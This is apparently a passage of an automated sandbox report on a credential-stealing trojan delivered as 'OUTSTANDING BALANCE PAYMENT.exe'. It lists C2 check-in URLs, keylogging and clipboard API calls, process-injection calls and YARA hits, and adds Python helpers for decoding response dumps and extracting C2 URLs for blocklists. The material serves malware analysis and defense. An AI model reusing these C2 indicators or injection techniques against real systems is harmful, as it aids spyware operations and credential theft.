                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
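The responses above are the decoy and C2 hosts answering the sample's check-ins: Apache and nginx return fixed-length 404 pages, while the Cloudflare-fronted hosts return chunked, gzip-compressed bodies whose "Data Ascii" rendering is unreadable and whose "Data Raw" dump is cut off mid-body. The following helper, an added example and not part of the Joe Sandbox report, takes a "Data Raw" hex dump plus the headers that matter, undoes chunked transfer encoding, inflates gzip with a streaming decompressor so a truncated dump still yields the recoverable prefix, and pulls out the page title. The HTML, header dicts and dumps in the block are constructed for the example; only the overall shape mirrors the entries above.

```python
import gzip
import re
import zlib


def dechunk(body: bytes) -> bytes:
    """Undo HTTP/1.1 chunked transfer encoding.

    Tolerates a dump that stops mid-chunk (as the report's Data Raw fields do):
    whatever bytes of the last chunk are present are kept, and a missing or
    malformed size line ends the loop instead of raising.
    """
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            break                                         # size line cut off
        try:
            size = int(body[pos:end].split(b";")[0], 16)  # drop chunk extensions
        except ValueError:
            break                                         # not a size line: stop
        if size == 0:
            break                                         # last-chunk marker
        pos = end + 2
        out += body[pos:pos + size]                       # short if truncated
        pos += size + 2                                   # data + trailing CRLF
    return bytes(out)


def gunzip_partial(data: bytes) -> bytes:
    """Inflate a gzip stream, returning what decodes even if the tail is missing.

    gzip.decompress() raises on a truncated stream; a streaming decompressor
    hands back the prefix it could recover, which is all a cut-off dump allows.
    """
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)    # +16: expect gzip framing
    return inflater.decompress(data)


def decode_body(headers: dict, data_raw_hex: str) -> bytes:
    """Turn a 'Data Raw' hex dump into the response body the client saw."""
    raw = bytes.fromhex(data_raw_hex)                     # accepts spaced hex
    if headers.get("Transfer-Encoding", "").lower() == "chunked":
        raw = dechunk(raw)
    if headers.get("Content-Encoding", "").lower() == "gzip":
        raw = gunzip_partial(raw)
    return raw


def page_title(html: bytes) -> str:
    """The <title> of a decoy page, the quickest way to tell hosts apart."""
    m = re.search(rb"<title>(.*?)</title>", html, re.I | re.S)
    return m.group(1).decode("utf-8", "replace").strip() if m else ""


# Constructed samples (built here, not copied from the report): a chunked,
# gzip-encoded 404 like the Cloudflare-fronted responses, and a plain
# Content-Length 404 like the nginx ones. The HTML text is the example's own.
SAMPLE_HTML = (
    b'<!DOCTYPE html>\r\n<html lang="pt-BR"><head><meta charset="UTF-8">'
    b"<title>Hospedagem de Site com Dom\xc3\xadnio Gr\xc3\xa1tis - HostGator</title>"
    b"</head><body></body></html>"
)
_GZ = gzip.compress(SAMPLE_HTML, mtime=0)
_CHUNKED = b"%x\r\n%s\r\n0\r\n\r\n" % (len(_GZ), _GZ)
CHUNKED_HEADERS = {"Transfer-Encoding": "chunked", "Content-Encoding": "gzip", "Server": "cloudflare"}
CHUNKED_HEX = _CHUNKED.hex(" ")
TRUNCATED_HEX = _CHUNKED[: len(_CHUNKED) // 2].hex(" ")   # mimics a cut-off dump
PLAIN_HEADERS = {"Server": "nginx", "Content-Length": "54"}
PLAIN_HEX = b"<html><head><title>404 Not Found</title></head></html>".hex(" ")

if __name__ == "__main__":
    for name, hdrs, dump in [("cloudflare", CHUNKED_HEADERS, CHUNKED_HEX),
                             ("nginx", PLAIN_HEADERS, PLAIN_HEX),
                             ("truncated", CHUNKED_HEADERS, TRUNCATED_HEX)]:
        body = decode_body(hdrs, dump)
        print(f"{name:10} {len(body):4d} bytes  title={page_title(body)!r}")
```

On the report's real dumps the truncated path is the normal one: the gzip member is cut off, so expect a partial body and no CRC check rather than an error.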
                Source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000005.00000002.4599573362.000000000481C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4601549732.0000000006680000.00000004.00000800.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000003BFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.00000000056B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duwixushx.xyz
                Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.00000000056B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duwixushx.xyz/q0vk/
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000005.00000002.4599573362.0000000004366000.00000004.10000000.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000003746000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000005.00000003.2577600251.00000000080AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: bitsadmin.exe, 00000005.00000002.4599573362.0000000005188000.00000004.10000000.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000004568000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
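Among the strings above, the two that matter for blocking are the plain-HTTP URLs with a short path segment (http://www.amayavp.xyz/d9ku/?6dr=... and http://www.duwixushx.xyz/q0vk/); the rest are browser search-provider and Microsoft login strings that bitsadmin.exe and the injected process carry for unrelated reasons. The following extractor is an added example, not part of the report or of Joe Sandbox: it parses evidence lines of the form shown above, keeps only URLs matching a heuristic shape (plain http, a www. host, a 2-6 character alphanumeric path, an optional short query key), and groups them by host together with the processes whose memory held them. The URL shape is an assumption of this example, not a FormBook specification, so treat the output as candidates for analyst review. The sample lines are constructed from the entries above with shortened memory-region identifiers.

```python
import re
from collections import defaultdict

# One evidence line of the report, as flattened above: the memory-region list,
# then "String found in binary or memory:" and the string itself.
LINE_RE = re.compile(r"Source:\s*(?P<src>.*?)String found in binary or memory:\s*(?P<url>\S+)")
PROC_RE = re.compile(r"[A-Za-z0-9_.-]+\.exe")

# Heuristic URL shape, an assumption of this example and not a FormBook
# specification: plain http, a www. host, a short alphanumeric path segment,
# and optionally one short query key with an opaque value.
C2_RE = re.compile(
    r"^http://www\.(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})"
    r"/(?P<path>[a-z0-9]{2,6})/"
    r"(?:\?(?P<key>[a-z0-9]{2,4})=(?P<val>[A-Za-z0-9+/=_-]+))?$",
    re.I,
)


def extract_c2_candidates(lines):
    """Group C2-shaped URLs by host, with the processes whose memory held them."""
    hosts = defaultdict(lambda: {"paths": set(), "query_keys": set(), "processes": set()})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        c2 = C2_RE.match(m.group("url"))
        if not c2:
            continue                      # browser/OS strings, bare hosts, https
        entry = hosts[c2.group("host").lower()]
        entry["paths"].add(c2.group("path"))
        entry["processes"].update(PROC_RE.findall(m.group("src")))
        if c2.group("key"):
            entry["query_keys"].add(c2.group("key"))
    return dict(hosts)


def ioc_lines(hosts):
    """Flat, sortable IOC lines (host, path, processes) for a blocklist or hunt."""
    return sorted(f"{host}\t/{path}/\t{','.join(sorted(info['processes']))}"
                  for host, info in hosts.items() for path in info["paths"])


# Constructed report lines reusing the strings listed above; the memory-region
# identifiers are shortened and the benign entries mirror the real ones.
SAMPLE_LINES = [
    "Source: svchost.exe, 00000002.00000003.2348113087.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.sdmpString found in binary or memory: http://server/get.asp",
    "Source: bitsadmin.exe, 00000005.00000002.4599573362.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2",
    "Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.sdmpString found in binary or memory: http://www.duwixushx.xyz",
    "Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.sdmpString found in binary or memory: http://www.duwixushx.xyz/q0vk/",
    "Source: bitsadmin.exe, 00000005.00000003.2587885669.sdmpString found in binary or memory: https://www.ecosia.org/newtab/",
    "Source: bitsadmin.exe, 00000005.00000002.4599573362.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.sdmpString found in binary or memory: https://www.hostgator.com.br",
]

if __name__ == "__main__":
    for line in ioc_lines(extract_c2_candidates(SAMPLE_LINES)):
        print(line)
```

The bare host http://www.duwixushx.xyz is dropped on purpose: without a path it is not evidence of a check-in URL, and the same host is captured via its /q0vk/ entry. Hosts that only ever appear as bare strings would need a separate pass.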
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002D6B0C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002D6D07
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_002C2B37
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_002EF7FF

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: This is a third-party compiled AutoIt script.0_2_00283D19
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c8e072d6-1
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: +SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4be403ee-d
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f9d193bb-8
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f8b2558d-e
                Source: initial sampleStatic PE information: Filename: OUTSTANDING BALANCE PAYMENT.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA93 NtClose,2_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F60 NtCreateProcessEx, 2_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F30 NtCreateSection, 2_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FE0 NtCreateFile, 2_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FA0 NtQuerySection, 2_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FB0 NtResumeThread, 2_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F90 NtProtectVirtualMemory, 2_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E30 NtWriteVirtualMemory, 2_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EE0 NtQueueApcThread, 2_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, 2_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E80 NtReadVirtualMemory, 2_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D30 NtUnmapViewOfSection, 2_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D00 NtSetInformationFile, 2_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D10 NtMapViewOfSection, 2_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DD0 NtDelayExecution, 2_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DB0 NtEnumerateKey, 2_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C60 NtCreateKey, 2_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C70 NtFreeVirtualMemory, 2_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C00 NtQueryInformationProcess, 2_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CF0 NtOpenProcess, 2_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CC0 NtQueryVirtualMemory, 2_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CA0 NtQueryInformationToken, 2_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673010 NtOpenDirectoryObject, 2_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673090 NtSetValueKey, 2_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036739B0 NtGetContextThread, 2_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D70 NtOpenThread, 2_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D10 NtOpenProcessToken, 2_2_03673D10
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002C6606: CreateFileW,DeviceIoControl,CloseHandle, 0_2_002C6606
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_002BACC5
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_002C79D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 111 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: String function: 002A6AC0 appears 42 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: String function: 002AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: String function: 0029EC2F appears 68 times
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003D03000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs OUTSTANDING BALANCE PAYMENT.exe
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144291717.0000000003EAD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs OUTSTANDING BALANCE PAYMENT.exe
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
